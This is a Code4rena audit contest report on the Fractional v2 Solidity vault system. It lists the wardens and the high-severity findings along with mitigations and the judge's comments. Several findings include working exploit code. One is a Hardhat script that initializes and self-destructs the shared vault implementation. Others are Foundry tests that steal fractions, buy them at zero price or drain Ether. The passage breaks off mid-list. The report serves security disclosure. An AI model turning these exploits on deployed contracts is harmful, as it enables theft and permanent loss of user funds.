sponsor | slug | date | title | findings | contest |
Fractional |
2022-07-fractional |
2022-09-27 |
Fractional v2 contest |
144 |
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit contest is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit contest outlined in this document, C4 conducted an analysis of the Fractional v2 smart contract system written in Solidity. The audit contest took place between July 7—July 14 2022.
156 Wardens contributed reports to the Fractional v2 contest:
- kenzo
- 0x29A (0x4non and rotcivegaf)
- cccz
- 0x52
- hansfriese
- zzzitron
- Treasure-Seeker
- TrungOre
- PwnedNoMore (izhuer, ItsNio, and papr1ka2)
- scaraven
- berndartmueller
- sseefried
- 0xA5DF
- Lambda
- xiaoming90
- panprog
- 0xsanson
- codexploder
- hyh
- unforgiven
- 0x1f8b
- shenwilly
- smiling_heretic
- IllIllI
- ElKu
- dipp
- infosec_us_team
- bin2chen
- Critical
- oyc_109
- joestakey
- 0xNineDec
- minhtrng
- 0xDjango
- 242
- ayeslick
- sorrynotsorry
- Ruhum
- pashov
- 0xalpharush
- jonatascm
- 0x (Czar102 and pmerkleplant)
- horsefacts
- simon135
- BowTiedWardens (BowTiedHeron, BowTiedPickle, m4rio_eth, Dravee, and BowTiedFirefox)
- s3cunda
- 0xNazgul
- neumo
- exd0tpy
- c3phas
- bbrho
- minhquanym
- ak1
- cryptphi
- Saintcode_
- Franfran
- sashik_eth
- kyteg
- _Adam
- Kaiziron
- TomJ
- Sm4rty
- _141345_
- Deivitto
- ReyAdmirado
- Kumpa
- robee
- Funen
- Waze
- mektigboy
- Bnke0x0
- JC
- Tutturu
- kebabsec (okkothejawa and FlameHorizon)
- rbserver
- apostle0x01
- Tomio
- 0xsolstars (Varun_Verma and masterchief)
- 8olidity
- fatherOfBlocks
- benbaessler
- asutorufos
- sach1r0
- delfin454000
- rokinot
- Rohan16
- durianSausage
- pedr02b2
- auditor0517
- async
- hubble (ksk2345 and shri4net)
- chatch
- m_Rassska
- hake
- peritoflores
- Amithuddar
- Kthere
- 0xf15ers (remora and twojoy)
- aysha
- dy
- Hawkeye (0xwags and 0xmint)
- Kulk0
- rajatbeladiya
- sahar
- David_
- cloudjunky
- Viksaa39
- svskaushik
- Keen_Sheen
- z3s
- Aymen0909
- 0xKitsune
- hrishibhat
- slywaters
- giovannidisiena
- Chom
- 0xSky
- gogo
- Limbooo
- Avci (0xArshia and 0xdanial)
- 0xkatana
- ajtra
- RedOneN
- brgltd
- ignacio
- Fitraldys
- jocxyen
- karanctf
- djxploit
- dharma09
- NoamYakov
- tofunmi
- ACai
- BradMoon
- nine9
- reassor
- Twpony
- byterocket (pseudorandom and pmerkleplant)
- bardamu
- StyxRave
This contest was judged by HardlyDifficult.
Final report assembled by itsmetechjay.
The C4 analysis yielded an aggregated total of 32 unique vulnerabilities. Of these vulnerabilities, 20 received a risk rating in the category of HIGH severity and 12 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 97 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 76 reports recommending gas optimizations.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 Fractional v2 contest repository, and is composed of 37 smart contracts written in the Solidity programming language and includes 2,260 lines of Solidity code.
C4 assesses the severity of disclosed vulnerabilities according to a methodology based on OWASP standards.
Vulnerabilities are divided into three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
Further information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website.
Submitted by 0xA5DF, also found by 242, 0x, 0xsanson, Critical, sorrynotsorry, unforgiven, and zzzitron
This is a basic uninitialized proxy bug, the VaultFactory
creates a single implementation of Vault
and then creates a proxy to that implementation every time a new vault needs to be deployed.
The problem is that that implementation vault is not initialized , which means that anybody can initialize the contract to become the owner, and then destroy it by doing a delegate call (via the execute
function) to a function with the selfdestruct
Once the implementation is destroyed all of the vaults will be unusable. And since there's no logic in the proxies to update the implementation - that means this is permanent (i.e. there's no way to call any function on any vault anymore, they're simply dead).
This is a critical bug, since ALL assets held by ALL vaults will be lost. There's no way to transfer them out and there's no way to run any function on any vault.
Also, there's no way to fix the current deployed contracts (modules and registry), since they all depend on the factory vault, and there's no way to update them to a different factory. That means Fractional would have to deploy a new set of contracts after fixing the bug (this is a relatively small issue though).
I created the PoC based on the scripts/deploy.js
file, here's a stripped-down version of that:
const { ethers } = require("hardhat");
const ZERO_ADDRESS = "0x0000000000000000000000000000000000000000";
async function main() {
const [deployer, attacker] = await ethers.getSigners();
// Get all contract factories
const BaseVault = await ethers.getContractFactory("BaseVault");
const Supply = await ethers.getContractFactory("Supply");
const VaultRegistry = await ethers.getContractFactory("VaultRegistry");
// Deploy contracts
const registry = await VaultRegistry.deploy();
await registry.deployed();
const supply = await Supply.deploy(registry.address);
await supply.deployed();
// notice that the `factory` var in the original `deploy.js` file is a different factory than the registry's
const registryVaultFactory = await ethers.getContractAt("VaultFactory", await registry.factory());
const implVaultAddress = await registryVaultFactory.implementation();
const vaultImpl = await ethers.getContractAt("Vault", implVaultAddress);
const baseVault = await BaseVault.deploy(registry.address, supply.address);
await baseVault.deployed();
// proxy vault - the vault that's used by the user
let proxyVault = await deployVault(baseVault, registry, attacker);
const destructorFactory = await ethers.getContractFactory("Destructor");
const destructor = await destructorFactory.deploy();
let destructData = destructor.interface.encodeFunctionData("destruct", [attacker.address]);
const abi = new ethers.utils.AbiCoder();
const leafData = abi.encode(["address", "address", "bytes4"],
[attacker.address, destructor.address, destructor.interface.getSighash("destruct")]);
const leafHash = ethers.utils.keccak256(leafData);
await vaultImpl.connect(attacker).init();
await vaultImpl.connect(attacker).setMerkleRoot(leafHash);
// we don't really need to do this ownership-transfer, because the contract is still usable till the end of the tx, but I'm doing it just in case
await vaultImpl.connect(attacker).transferOwnership(ZERO_ADDRESS);
// before: everything is fine
let implVaultCode = await ethers.provider.getCode(implVaultAddress);
console.log("Impl Vault code size before:", implVaultCode.length - 2); // -2 for the 0x prefix
let owner = await proxyVault.owner();
console.log("Proxy Vault works fine, owner is: ", owner);
await vaultImpl.connect(attacker).execute(destructor.address, destructData, []);
// after: vault implementation is destructed
implVaultCode = await ethers.provider.getCode(implVaultAddress);
console.log("\nVault code size after:", implVaultCode.length - 2); // -2 for the 0x prefix
try {
owner = await proxyVault.owner();
} catch (e) {
console.log("Proxy Vault isn't working anymore.", e.toString().substring(0, 300));
async function deployVault(baseVault, registry, attacker) {
const nodes = await baseVault.getLeafNodes();
const tx = await registry.connect(attacker).create(nodes[0], [], []);
const receipt = await tx.wait();
const vaultEvent = receipt.events.find(e => e.address == registry.address);
const newVaultAddress = vaultEvent.args._vault;
const newVault = await ethers.getContractAt("Vault", newVaultAddress);
return newVault;
if (require.main === module) {
// SPDX-License-Identifier: MIT
pragma solidity 0.8.13;
contract Destructor{
function destruct(address payable dst) public {
Impl Vault code size before: 10386
Proxy Vault works fine, owner is: 0x5FbDB2315678afecb367f032d93F642f64180aa3
Vault code size after: 0
Proxy Vault isn't working anymore. Error: call revert exception [ See: https://links.ethers.org/v5-errors-CALL_EXCEPTION ] (method="owner()", data="0x", errorArgs=null, errorName=null, errorSignature=null, reason=null, code=CALL_EXCEPTION, version=abi/5.6.2)
Sidenote: as the comment in the code says, we don't really need to transfer the ownership to the zero address.
It's just that Foundry's forge
did revert the destruction when I didn't do it, with the error of OwnerChanged
(i.e. once the selfdestruct
was called the owner became the zero address, which is different than the original owner) so I decided to add this just in case.
This is probably a bug in forge
, since the contract shouldn't destruct till the end of the tx (Hardhat indeed didn't revert the destruction even when the attacker was the owner).
Add init in Vault
's constructor (and make the init
function public
instead of external
contract Vault is IVault, NFTReceiver {
/// @notice Address of vault owner
address public owner;
/// ...
// initialize implementation
/// @dev Initializes nonce and proxy owner
function init() public {
Alternately you can add init in VaultFactory.sol
constructor, but I think initializing in the contract itself is a better practice.
/// @notice Initializes implementation contract
constructor() {
implementation = address(new Vault());
After mitigation the PoC will output this:
Error: VM Exception while processing transaction: reverted with custom error 'Initialized("0xa16E02E87b7454126E5E10d957A927A7F5B5d2be", "0x70997970C51812dc3A010C7d01b50e0d17dc79C8", 1)'
at Vault._execute (src/Vault.sol:124)
at Vault.init (src/Vault.sol:24)
at HardhatNode._mineBlockWithPendingTxs
stevennevins (Fractional) confirmed and commented:
Acknowledging the severity of this and will fix it. Thank you for reporting @0xA5DF.
HardlyDifficult (judge) commented:
Agree this is High risk. If this had gone unnoticed for a period of time, then later self destructing the implementation contract would brick all vaults and lose funds for potentially many users.
Submitted by cccz
In the end function of the Buyout contract, when the buyout fails, ERC1155 tokens are sent to the proposer. A malicious proposer can start a buyout using a contract that cannot receive ERC1155 tokens, and if the buyout fails, the end function fails because it cannot send ERC1155 tokens to the proposer. This prevents a new buyout from being started.
Consider saving the status of the proposer after a failed buyout and implementing functions to allow the proposer to withdraw the ERC1155 tokens and eth.
Ferret-san (Fractional) confirmed
HardlyDifficult (judge) commented:
The 1155 receiver can prevent a failed buyout from ending, which prevents a new one from starting. Agree with severity.
Submitted by kenzo, also found by 0x1f8b, bin2chen, codexploder, dipp, minhtrng, and smiling_heretic
In Migration, when joining or leaving a migration proposal, Fractional does not check whether the user supplied proposalId
and vault
match the actual vault that the proposal belongs to.
This allows the user to trick the accounting.
Loss of funds for users.
Malicious users can withdraw tokens from proposals which have not been committed yet.
Let's say Vault A's FERC1155 token is called TOKEN. Alice has deposited 100 TOKEN in Migration to Vault A on proposal ID 1.
Now Malaclypse creates Vault B with token ERIS as FERC1155 and mints 100 tokens to himself.
He then calls Migration's join
with amount as 100, Vault B as vault
, proposal ID as 1.
The function will get ERIS as the token to deposit.
It will pull the ERIS from Mal.
And now for the problem - it will set the following variable:
userProposalFractions[_proposalId][msg.sender] += _amount;
Notice that this does not correspond to the vault number.
Now, Mal will call the leave
function, this time with Vault A address and proposal ID 1.
The function will get the token to send from the vault as TOKEN.
It will get the amount to withdraw from userProposalFractions[_proposalId][msg.sender]
, which as we saw previously will be 100.
It will deduct this amount from migrationInfo[_vault][_proposalId]
, which won't revert as Alice deposited 100 to this vault and proposal.
And finally it will send 100 TOKENs to Mal - although he deposited ERIS.
Mal received Alice's valuable tokens.
I think that one option would be to save for each proposal which vault it corresponds to. Then you can verify that user supplies a matching vault-proposal pair, or he can even just supply proposal and the contract will get the vault from that.
Another solution would be to have userProposalFractions
save the relevant vault also, not just a general proposal id.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
The warden's POC shows how an attacker can effectively steal tokens by creating a migration for a new vault with worthless tokens and reusing an existing
, then withdrawing valuable tokens from the original proposal. I agree this is a High risk issue.
Submitted by 0xA5DF, also found by 0x52, exd0tpy, horsefacts, hyh, kenzo, Lambda, minhquanym, panprog, scaraven, shenwilly, and simon135
Divisions in EVM are rounded down, which means when the fraction price is close to 1 (e.g. 0.999) it would effectively be zero, when it's close to 2 (1.999) it would be rounded to 1 - losing close to 50% of the intended price.
- In case the proposer had any fractions, the buyout module puts them for sale and he can lose his fractions while getting in exchange either zero or a significantly lower price than intended
- Even when the proposer doesn't hold any fractions, if the buyout succeeds - the difference (i.e.
buyoutPrice - fractionPrice*totalSupply
) goes to those who cash out their fractions after the buyout ends.- That's going to disincentivize users to sell their fractions during the buyout, because they may get more if they keep it till the buyout ends.
- In other words, not only that the extra money the proposer paid doesn't increase the chance of the buyout to succeed, it actually decreases it.
I've added the following tests to test/Buyout.t.sol
// add Eve to the list of users
function setUp() public {
alice = setUpUser(111, 1);
bob = setUpUser(222, 2);
eve = setUpUser(333, 3);
vm.label(address(this), "BuyoutTest");
vm.label(alice.addr, "Alice");
vm.label(bob.addr, "Bob");
vm.label(eve.addr, "Eve");
// a scenario where the price is zero, and the proposer ends up loosing all his fractions
function test_bugFractionPriceIsZero() public{
uint totalSupply = 21e17;
uint BOB_INITIAL_BALANCE = totalSupply / 2;
initializeBuyout(alice, bob, totalSupply, BOB_INITIAL_BALANCE, true);
// Bob starts a buyout with 1 ether for the other half of total fractions
bob.buyoutModule.start{value: 1 ether}(vault);
eve.buyoutModule.buyFractions{value: 0}(vault, BOB_INITIAL_BALANCE);
// Eve got all Bob's fractions for the very tempting price of 0
assertEq(getFractionBalance(eve.addr), BOB_INITIAL_BALANCE);
// a scenario where the price is 1, and the fraction price ends up being
// 50% of intended price.
// The user who cashes his fractions after the sale gets the difference (0.9 ether in this case).
function test_bugFractionPriceIsOne() public{
uint totalSupply = 11e17;
uint BOB_INITIAL_BALANCE = totalSupply / 10;
initializeBuyout(alice, bob, totalSupply, BOB_INITIAL_BALANCE, true);
uint aliceFractionBalance = totalSupply * 9 / 10;
uint256 buyoutPrice = 2 ether;
uint256 fractionPrice = buyoutPrice / totalSupply;
assertEq(fractionPrice, 1);
// We need to approve the buyout even though Eve doesn't hold any fractions
eve.ferc1155 = new FERC1155BS(address(0), 333, token);
setApproval(eve, buyout, true);
eve.buyoutModule.start{value: buyoutPrice}(vault);
// alice selling all her fractions
alice.buyoutModule.sellFractions(vault, aliceFractionBalance);
// 4 days till buyout ends
vm.warp(block.timestamp + 4.1 days);
bob.buyoutModule.end(vault, burnProof);
bob.buyoutModule.cash(vault, burnProof);
// Alice revenue should be about 0.99 ether
uint256 aliceExpectedETHRevenue = fractionPrice * aliceFractionBalance;
// Bob revenue should be about 1.01 ether
uint256 bobExpectedETHRevenue = buyoutPrice - aliceExpectedETHRevenue;
// Bob earned more than Alice even though Alice had 9 times his fractions
// This means Bob got ~9 times ETH per fraction than Alice
assertTrue(bobExpectedETHRevenue > aliceExpectedETHRevenue);
// Just make sure they have the expected balance
assertEq(getETHBalance(alice.addr), aliceExpectedETHRevenue + INITIAL_BALANCE);
assertEq(getETHBalance(bob.addr), bobExpectedETHRevenue + INITIAL_BALANCE);
- Request the user to send the intended fraction price (as a function arg) and then make sure he sent enough ETH. This way the user is well aware of the fraction price.
- An advantage of this method is that the buyout price calculation is also more accurate (compared to
(msg.value * 100) /(100 - ((depositAmount * 100) / totalSupply))
which has a rounding of up to 1%) - Optional - you can also refund the user if he sent too much ETH, though this is probably unnecessary since the UI should calculate the exact amount the user should send.
Proposed code for solution A:
/// @param _vault Address of the vault
- function start(address _vault) external payable {
+ function start(address _vault, uint256 _fractionPrice) external payable {
// Reverts if ether deposit amount is zero
if (msg.value == 0) revert ZeroDeposit();
// Reverts if address is not a registered vault
@@ -66,6 +66,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
(, , State current, , , ) = this.buyoutInfo(_vault);
State required = State.INACTIVE;
if (current != required) revert InvalidState(required, current);
+ if (fractionPrice == 0) revert ZeroFractionPrice();
@@ -83,9 +84,10 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
// Calculates price of buyout and fractions
// @dev Reverts with division error if called with total supply of tokens
- uint256 buyoutPrice = (msg.value * 100) /
- (100 - ((depositAmount * 100) / totalSupply));
- uint256 fractionPrice = buyoutPrice / totalSupply;
+ uint256 fractionPrice = _fractionPrice;
+ uint256 buyoutPrice = fractionPrice * totalSupply;
+ uint256 requiredEth = fractionPrice * (totalSupply - depositAmount);
+ if (msg.value != requiredEth) revert InvalidPayment();
// Sets info mapping of the vault address to auction struct
- The problem with solution A is that it doesn't let much flexibility in case that total supply is large. In the example in the PoC (
totalSupply = 2.1e18
) the buyout price can be either 2.1 ETH or 4.2 ETH, if the user wants to offer 1.5 ETH or 3 ETH he can't do it. - This solution solves this - instead of basing the buy/sell price on the fraction price - use the buyout price to calculate the buy/sell price.
- This would cause a slight differential price (buying 1K fractions would have a slightly different price than 1M fractions).
- However, note that the rounding here is probably insignificant, since the rounding would be no more than 1 wei per buy/sell
- Also, the more the users buy/sell the more accurate the price would be (the less you buy the more you'll pay, the less you sell the less you'd get).
- For selling just calculate
price = (buyoutPrice * amount) / totalSupply
- For buying do the same, just add 1 wei if there was any rounding (see code below)
- If you're worried about the rounding of the buyout price (compared to solution A), you can increase the coefficient (this doesn't cost any extra gas, and is nearly impossible to overflow):
(ethDeposit * 1e6) / (1e6 - ((fractionDeposit * 1e6) / totalSupply))
Proposed code for solution B:
--- a/src/interfaces/IBuyout.sol
+++ b/src/interfaces/IBuyout.sol
@@ -20,7 +20,7 @@ struct Auction {
// Enum state of the buyout auction
State state;
// Price of fractional tokens
- uint256 fractionPrice;
+ uint256 buyoutPrice;
// Balance of ether in buyout pool
uint256 ethBalance;
// Total supply recorded before a buyout started
--- a/src/modules/Buyout.sol
+++ b/src/modules/Buyout.sol
@@ -85,14 +85,14 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
// @dev Reverts with division error if called with total supply of tokens
uint256 buyoutPrice = (msg.value * 100) /
(100 - ((depositAmount * 100) / totalSupply));
- uint256 fractionPrice = buyoutPrice / totalSupply;
+ uint256 estimatedFractionPrice = buyoutPrice / totalSupply;
// Sets info mapping of the vault address to auction struct
buyoutInfo[_vault] = Auction(
- fractionPrice,
+ // replace fraction price with buyout price in the Auction struct
+ buyoutPrice,
@@ -102,7 +102,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
- fractionPrice
+ estimatedFractionPrice
@@ -115,7 +115,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
if (id == 0) revert NotVault(_vault);
- (uint256 startTime, , State current, uint256 fractionPrice, , ) = this
+ (uint256 startTime, , State current, uint256 buyoutPrice, , uint256 totalSupply ) = this
// Reverts if auction state is not live
State required = State.LIVE;
@@ -135,7 +135,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
// Updates ether balance of pool
- uint256 ethAmount = fractionPrice * _amount;
+ uint256 ethAmount = buyoutPrice * _amount / totalSupply;
buyoutInfo[_vault].ethBalance -= ethAmount;
// Transfers ether amount to caller
_sendEthOrWeth(msg.sender, ethAmount);
@@ -153,7 +153,7 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
if (id == 0) revert NotVault(_vault);
// Reverts if auction state is not live
- (uint256 startTime, , State current, uint256 fractionPrice, , ) = this
+ (uint256 startTime, , State current, uint256 buyoutPrice, , uint256 totalSupply ) = this
State required = State.LIVE;
if (current != required) revert InvalidState(required, current);
@@ -161,8 +161,13 @@ contract Buyout is IBuyout, Multicall, NFTReceiver, SafeSend, SelfPermit {
uint256 endTime = startTime + REJECTION_PERIOD;
if (block.timestamp > endTime)
revert TimeExpired(block.timestamp, endTime);
+ uint256 price = (buyoutPrice * _amount) / totalSupply;
+ if (price * totalSupply < buyoutPrice * _amount){
+ price++;
+ }
// Reverts if payment amount does not equal price of fractional amount
- if (msg.value != fractionPrice * _amount) revert InvalidPayment();
+ if (msg.value != price) revert InvalidPayment();
// Transfers fractional tokens to caller
HardlyDifficult (judge) increased severity to High and commented:
Rounding impacting
can significantly impact other math in this module. I think this is a High risk issue, given the right circumstances such as the example above where the buy price becomes zero, assets are compromised.Selecting this instance as the primary issue for including test code and the detailed recs.
[H-05] Migration::withdrawContribution falsely assumes that user should get exactly his original contribution back
Submitted by kenzo, also found by 0x52, ElKu, hansfriese, hyh, and panprog
When a user calls withdrawContribution
, it will try to send him back his original contribution for the proposal.
But if the proposal has been committed, and other users have interacted with the buyout, Migration will receive back a different amount of ETH and tokens.
Therefore it shouldn't send the user back his original contribution, but should send whatever his share is of whatever was received back from Buyout.
Loss of funds for users. Some users might not be able to withdraw their contribution at all, and other users might withdraw funds that belong to other users. (This can also be done as a purposeful attack.)
A summary is described at the top.
It's probably not needed, but here's the flow in detail. When a user joins a proposal, Migration saves his contribution:
userProposalEth[_proposalId][msg.sender] += msg.value;
userProposalFractions[_proposalId][msg.sender] += _amount;
Later when the user would want to withdraw his contribution from a failed migration, Migration would refer to these same variables to decide how much to send to the user:
uint256 userFractions = userProposalFractions[_proposalId][msg.sender];
IFERC1155(token).safeTransferFrom(address(this), msg.sender, id, userFractions, "");
uint256 userEth = userProposalEth[_proposalId][msg.sender];
But if the proposal was committed, and other users interacted with the buyout, then the amount of ETH and tokens that Buyout sends back is not the same contribution.
For example, if another user called buyFractions
for the buyout, it will decrease the amount of tokens in the pool:
IERC1155(token).safeTransferFrom(address(this), msg.sender, id, _amount, "");
And when the proposal will end, if it has failed, Buyout will send back to Migration the amount of tokens in the pool:
uint256 tokenBalance = IERC1155(token).balanceOf(address(this), id);
IERC1155(token).safeTransferFrom(address(this), proposer, id, tokenBalance, "");
(**Same will happen for the ETH amount)
Therefore, Migration will receive back less tokens than the original contribution.
When the user will try to call withdrawContribution
to withdraw his contribution from the pool, Migration would try to send the user's original contribution.
But there's a deficit of that.
If other users have contributed the same token, then it will transfer their tokens to the user.
If not, then the withdrawal will simply revert for insufficient balance.
I am not sure, but I think that the correct solution would be that upon a failed proposal's end, there should be a hook call from Buyout to the proposer - in our situation, Migration. Migration would then see(/receive as parameter) how much ETH/tokens were received, and update the proposal with the change needed. eg. send to each user 0.5 his tokens and 1.5 his ETH.
In another issue I submitted, "User can't withdraw assets from failed migration if another buyout is going on/succeeded", I described for a different reason why such a callback to Migration might be needed. Please see there for more implementation suggestions.
I think this issue shows that indeed it is needed.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
After an unsuccessful migration, some users will be unable to recover their funds due to a deficit in the contract. Agree this is a High risk issue.
Submitted by panprog, also found by 0x52, 0xsanson, hansfriese, shenwilly, and zzzitron
When buyout starts, it takes all fractions owned by proposer. This means that when Migration
contract starts a buyout, it takes all fractions it has, not just the fractions from the proposal. This is easily exploitable by anyone.
Stealing fractions scenario:
- Bob starts a proposal, deposits
fractions - Alice immediately starts another proposal with
targetPrice = 0
, deposits0 fractions
and minimal ether (value: 1
, which is10^-18 ether
) - Since price is larger than targetPrice, Alice immediately commits the proposal
- Buyout is started, but instead of
0 fractions
it has3000 fractions
from bob, because starting buyout took allMigration
's fractions. - Alice immediately buys
3000 fractions
from buyout for free (0 ether
). - At this point Alice has successfully stolen all deposited fractions.
Add this code to test/Migration.t.sol
function testPanprogBugH4() public {
initializeMigration(alice, bob, 10000, 10000, true);
(nftReceiverSelectors, nftReceiverPlugins) = initializeNFTReceiver();
// Migrate to a vault with no permissions (just to test out migration)
address[] memory newModules = new address[](2);
newModules[0] = migration;
newModules[1] = modules[1];
// Bob makes the proposal
10 ether
// Bob joins the proposal with 3000 fractions
bob.migrationModule.join{value: 1 ether}(vault, 1, 3000);
// Alice starts a competing proposal (we use bob's data for simplicity)
0 ether
// Alice joins her proposal with 0 fractions and minimum allowed ether (for the price to be above target)
alice.migrationModule.join{value: 1}(vault, 2, 0);
// since the target price is reached, alice starts the buyout on her proposal
alice.migrationModule.commit(vault, 2);
// at this point buyout should be empty, but in fact due to bug it has 3000 fractions from bob
// alice can now buy fractions from buyout for free (it should revert, but it doesn't)
alice.buyoutModule.buyFractions(vault, 3000);
function should include amount of fractions a proposer deposits, and Migration
's commit
function should specify correct fractions amount when starting a buyout.
stevennevins (Fractional) confirmed
HardlyDifficult (judge) commented:
An attacker can steal fractions that have that have been used to join a migration. Agree this is a High risk issue.
Making this submission the primary instance for including a coded POC.
[H-07] Proposer can start
a perpetual buyout which can only end
if the auction succeeds and is not rejected
Submitted by sseefried, also found by TrungOre
A user can start a perpetual buyout that cannot be stopped except by making the buyout succeed. This can be done by creating a malicious contract that will call back to start
when it receives ETH via its receive
function. The user then starts the perpetual buyout by calling start
from the malicious contract.
Assume the rejection period has passed and the auction pool is not large enough (i.e. < 50%). If end
is called then the method _sendEthOrWeth
will attempt to send ETH to the malicious contract. The contract will simply call back to start
sending the ETH it has just received.
The impact is that end
can never be called on this buyout proposal if the buyout auction has failed. Worse, no new buyout proposal can be made since the current one is still live, and it is never in a state where it is not live.
The others users will either need to accept that assets are locked inside the vault, or that they will need to sellFractions
in order to make the buyout succeed.
- Each vault can only have one
associated with it as can be seen on line 39. - A new buyout proposal cannot be made unless the
state isState.INACTIVE
as can be seen in lines 66-68 - A proposer makes a proposal by calling
. They do this from a smart contract that simply callsstart
again when itsreceive
function is called. - If the proposer fails to get over 50% then, when
is called,_sendEthOrWeth
is called using theproposer
value which is the smart contract that re-enters. See line 235._sendETHOrWeth
is cleverly written so that ifreceive
were to revert the reversion would not "bubble up". However, it does not protect against re-entrancy. - This means that
can never be overwritten. It is permanently stuck in stateState.LIVE
meaning thatstart
can never be called forvault
by anyone else. - The only way out of this conundrum is for the other users of the vault to
to make the auction succeed or to accept that assets are locked in the vault forever.
A foundry test exhibiting this attack has been written in a private fork of the contest repo.
Note that onERC1155Received
needs to be implemented in the malicious contract.
Manual inspection + Foundry
Prevent re-entrancy in the start
function by using the nonReentrant
modifier provided by OpenZeppelin's ReentrancyGuard contract, or use an equivalent custom solution.
aklatham (Fractional) marked as duplicate and commented:
Duplicate of #87
This exploit is a duplicate of the others in most respects but there is one key difference. In the other submissions there is at least a chance that someone else will get in their buyout bid after 4 days by carefully submitting a transaction at just the right moment. With the exploit I have outlined they cannot even do this. The call to
will automatically create a new buyout with no chance of anyone else ever getting their transaction in. It is a truly perpetual buyout.To see an executable PoC of this (using a malicious contract to ensure the perpetual buyout) apply the diff in this gist and run
$ forge test -m testPerpetualBuyoutBug
stevennevins (Fractional) commented:
Thanks for the reply @sseefried! We felt this was the same underlying issue as #87 and others labeled as duplicates while having a more certain path to griefing.
HardlyDifficult (judge) commented:
Starting a buyout can result in assets being stuck in a contract. This submission shows how reentrancy can be used to make this even worse resulting in locking the assets up forever. This combination of concerns raises the issue to High risk.
Selecting this submission as the primary for identifying this potential impact and including a coded POC.
Submitted by berndartmueller, also found by 0xA5DF, 0xsanson, 0xSky, cccz, cryptphi, ElKu, hansfriese, jonatascm, kenzo, Kumpa, minhquanym, s3cunda, shenwilly, smiling_heretic, Treasure-Seeker, TrungOre, and zzzitron
The function Buyout.cash
allows a user to cash out proceeds (Ether) from a successful vault buyout.
However, due to how buyoutShare
is calculated in Buyout.cash
, users (fractional vault token holders) cashing out would receive more Ether than they are entitled to. The calculation is wrong as it uses the initial Ether balance stored in buyoutInfo[_vault].ethBalance
. Each consecutive cash-out will lead to a user receiving more Ether, ultimately draining the Ether funds of the Buyout
Copy paste the following test case into Buyout.t.sol
and run the test via forge test -vvv --match-test testCashDrainEther
The test shows how 2 users Alice and Eve cash out Ether from a successful vault buyout (which brought in 10 ether
). Alice and Eve are both entitled to receive 5 ether
each. Alice receives the correct amount when cashing out, however, due to a miscalculation of buyoutShare
(see #L268-L269), Eve can cash-out 10 ether
from the Buyout
function testCashDrainEther() public {
/// ==================
/// ===== SETUP =====
/// ==================
deployBaseVault(alice, TOTAL_SUPPLY);
(token, tokenId) = registry.vaultToToken(vault);
alice.ferc1155 = new FERC1155BS(address(0), 111, token);
bob.ferc1155 = new FERC1155BS(address(0), 222, token);
eve.ferc1155 = new FERC1155BS(address(0), 333, token);
buyout = address(buyoutModule);
proposalPeriod = buyoutModule.PROPOSAL_PERIOD();
rejectionPeriod = buyoutModule.REJECTION_PERIOD();
vm.label(vault, "VaultProxy");
vm.label(token, "Token");
setApproval(alice, vault, true);
setApproval(alice, buyout, true);
setApproval(bob, vault, true);
setApproval(bob, buyout, true);
setApproval(eve, vault, true);
setApproval(eve, buyout, true);
/// ==================
/// ===== SETUP END =====
/// ==================
/// Fraction balances:
assertEq(getFractionBalance(alice.addr), 2000); // Alice: 2000
assertEq(getFractionBalance(bob.addr), 6000); // Bob: 6000
assertEq(getFractionBalance(eve.addr), 2000); // Eve: 2000
bob.buyoutModule.start{value: 10 ether}(vault);
assertEq(getETHBalance(buyout), 10 ether);
/// Bob (proposer of buyout) transfered his fractions to buyout contract
assertEq(getFractionBalance(buyout), 6000);
vm.warp(rejectionPeriod + 1);
bob.buyoutModule.end(vault, burnProof);
/// Fraction balances after buyout ended:
assertEq(getFractionBalance(alice.addr), 2000); // Alice: 2000
assertEq(getFractionBalance(bob.addr), 0); // Bob: 0
assertEq(getFractionBalance(eve.addr), 2000); // Eve: 2000
assertEq(getETHBalance(buyout), 10 ether);
/// Alice cashes out 2000 fractions -> 5 ETH (correct amount)
alice.buyoutModule.cash(vault, burnProof);
assertEq(getFractionBalance(alice.addr), 0);
assertEq(getETHBalance(alice.addr), 105 ether);
/// Eve cashes out 2000 fractions -> REVERTS (internally it calculates Eve would receive 10 ETH instead of the entitled 5 ETH). If the contract holds sufficient Ether from other successful buyouts, Eve would receive the full 10 ETH
eve.buyoutModule.cash(vault, burnProof);
Additionally to the demonstrated PoC in the test case, an attacker could intentionally create vaults with many wallets and exploit the vulnerability:
- Attacker deploys a vault with
fractions minted - 51% of fractions (
) are kept in the main wallet, all other fractions are distributed to 5 other self-controlled wallets (Wallets 1-5,980
fractions each) - With the first wallet, the attacker starts a buyout with
10 ether
- fractions are transferred into theBuyout
contract as well as10 ether
- Attacker waits for
to elapse to callBuyout.end
(51% of fractions are already held in the contract, therefore no need for voting) - After the successful buyout, the attacker uses the
function to cash out each wallet. Each subsequent cash-out will lead to receiving more Ether, thus stealing Ether from theBuyout
contract:- Wallet 1 -
buyoutShare = (980 * 10 ) / (3920 + 980) = 2 ether
(totalSupply = 3920
after burning980
fractions from wallet 1) - Wallet 2 -
buyoutShare = (980 * 10 ) / (2940 + 980) = 2.5 ether
(totalSupply = 2940
after burning980
fractions from wallet 2) - Wallet 3 -
buyoutShare = (980 * 10 ) / (1960 + 980) = ~3.3 ether
(totalSupply = 1960
after burning980
fractions from wallet 3) - Wallet 4 -
buyoutShare = (980 * 10 ) / (980 + 980) = 5 ether
(totalSupply = 980
after burning980
